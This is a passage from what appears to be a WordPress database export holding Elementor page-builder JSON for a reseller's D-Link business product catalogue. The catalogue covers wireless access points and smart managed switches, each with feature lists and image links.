Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7361,3380,'_elementor_version','2.5.14'),(7362,3380,'_elementor_edit_mode','builder'),(7375,3382,'_elementor_version','2.5.14'),(7374,3382,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f179b24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6dd0023\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2445e57\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":49},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ed243d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"219\",\"right\":\"219\",\"bottom\":\"219\",\"left\":\"219\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4eb9a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"db46566\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"80\",\"bottom\":\"80\",\"left\":\"80\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"864ef7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":19},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361},\"image_size\":\"full\",\"image_custom_dimension\":{\"width\":\"1000\",\"height\":\"1000\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b8d278c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">Enjoy High-performance Wireless Connectivity<\\/h4><p style=\\\"text-align: left;\\\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><h4 style=\\\"text-align: center;\\\">MU-MIMO with Beamforming<\\/h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><h4 style=\\\"text-align: center;\\\">Multiple Operational Modes<\\/h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>Support Central WiFi Manager to configure and manage multiple AP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0912f1d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<br \\/>\\u2022 Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":29},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G 